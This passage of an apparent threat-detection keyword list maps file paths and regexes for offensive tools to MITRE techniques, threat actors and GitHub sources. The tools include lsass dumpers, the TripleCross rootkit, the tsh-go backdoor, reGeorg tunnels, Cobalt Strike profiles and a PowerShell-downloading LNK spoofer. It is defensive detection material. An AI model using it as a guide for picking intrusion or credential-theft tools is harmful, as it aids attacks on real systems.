cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z","12083" "*/trick_ryuk.profile*",".{0,1000}\/trick_ryuk\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike
Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","12084" "*/trickbot.profile*",".{0,1000}\/trickbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","12085" "*/TrickDump.git*",".{0,1000}\/TrickDump\.git.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","1","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","12086" "*/tricky.lnk.git*",".{0,1000}\/tricky\.lnk\.git.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. 
appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12087" "*/tricky.ps1*",".{0,1000}\/tricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12088" "*/tricky.vbs*",".{0,1000}\/tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12089" "*/tricky2.ps1*",".{0,1000}\/tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12090" "*/tried_logins.txt*",".{0,1000}\/tried_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","#linux","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","12091" "*/TriggerLinux/*",".{0,1000}\/TriggerLinux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12092" "*/TripleCross.git*",".{0,1000}\/TripleCross\.git.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12093" "*/TripleCross/apps/*",".{0,1000}\/TripleCross\/apps\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12094" "*/TripleCross-0.1.0.zip*",".{0,1000}\/TripleCross\-0\.1\.0\.zip.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - 
T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12095" "*/TripleCross-0.1.0/*",".{0,1000}\/TripleCross\-0\.1\.0\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12096" "*/trojan.exe*",".{0,1000}\/trojan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12097" "*/trollsploit/*",".{0,1000}\/trollsploit\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12098" "*/TROUBLE-1/Vajra*",".{0,1000}\/TROUBLE\-1\/Vajra.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","12099" 
"*/truesocks_rs.git*",".{0,1000}\/truesocks_rs\.git.{0,1000}","offensive_tool_keyword","TrueSocks","Simple API for buying renting and managing proxies","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","Defense Evasion","https://github.com/c0dn/truesocks_rs","1","1","N/A","N/A","10","1","0","0","2023-05-09T01:00:05Z","2023-04-06T02:32:04Z","12100" "*/trufflehog.git*",".{0,1000}\/trufflehog\.git.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","12101" "*/trufflehog/releases/download/*",".{0,1000}\/trufflehog\/releases\/download\/.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","12102" "*/trufflehog:latest *",".{0,1000}\/trufflehog\:latest\s.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","12103" "*/TruffleSnout.exe*",".{0,1000}\/TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12104" "*/TruffleSnout.exe*",".{0,1000}\/TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12105" "*/trusted_sec_bofs/*",".{0,1000}\/trusted_sec_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12106" "*/trusted_sec_remote_bofs/*",".{0,1000}\/trusted_sec_remote_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12107" "*/TrustedWave_x64.exe*",".{0,1000}\/TrustedWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12108" "*/tsh_linux_amd64*",".{0,1000}\/tsh_linux_amd64.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12109" "*/tsh_windows_amd64.exe*",".{0,1000}\/tsh_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - 
TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12110" "*/tshd.go*",".{0,1000}\/tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12111" "*/tshd_linux_amd64*",".{0,1000}\/tshd_linux_amd64.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12112" "*/tshd_windows.go*",".{0,1000}\/tshd_windows\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12113" "*/tshd_windows_amd64.exe*",".{0,1000}\/tshd_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12114" "*/tsh-go.git*",".{0,1000}\/tsh\-go\.git.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 
- T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12115" "*/tso-brute.nse*",".{0,1000}\/tso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12116" "*/tso-enum.nse*",".{0,1000}\/tso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12117" "*/tsunami.py*",".{0,1000}\/tsunami\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12118" "*/tsunami_warning.py*",".{0,1000}\/tsunami_warning\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12119" 
"*/TsunamiServer/*",".{0,1000}\/TsunamiServer\/.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12120" "*/TsunamiWave_x64.exe*",".{0,1000}\/TsunamiWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12121" "*/tun2socks.git*",".{0,1000}\/tun2socks\.git.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12122" "*/tun2socks/*",".{0,1000}\/tun2socks\/.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12123" "*/tun2socks-darwin*",".{0,1000}\/tun2socks\-darwin.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12124" "*/tun2socks-freebsd*",".{0,1000}\/tun2socks\-freebsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12125" "*/tun2socks-linux*",".{0,1000}\/tun2socks\-linux.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12126" "*/tun2socks-openbsd*",".{0,1000}\/tun2socks\-openbsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12127" "*/tun2socks-windows*",".{0,1000}\/tun2socks\-windows.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12128" "*/tunnel.nosocket.php*",".{0,1000}\/tunnel\.nosocket\.php.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","12130" "*/tunnel.tomcat.5.jsp*",".{0,1000}\/tunnel\.tomcat\.5\.jsp.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","12131" "*/tunnel-socks5.py*",".{0,1000}\/tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#linux","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","12167" "*/TunnelVision.git*",".{0,1000}\/TunnelVision\.git.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","12173" "*/TunnelVisionVM.ova*",".{0,1000}\/TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","12174" "*/turbo-intruder-all.jar*",".{0,1000}\/turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","12179" 
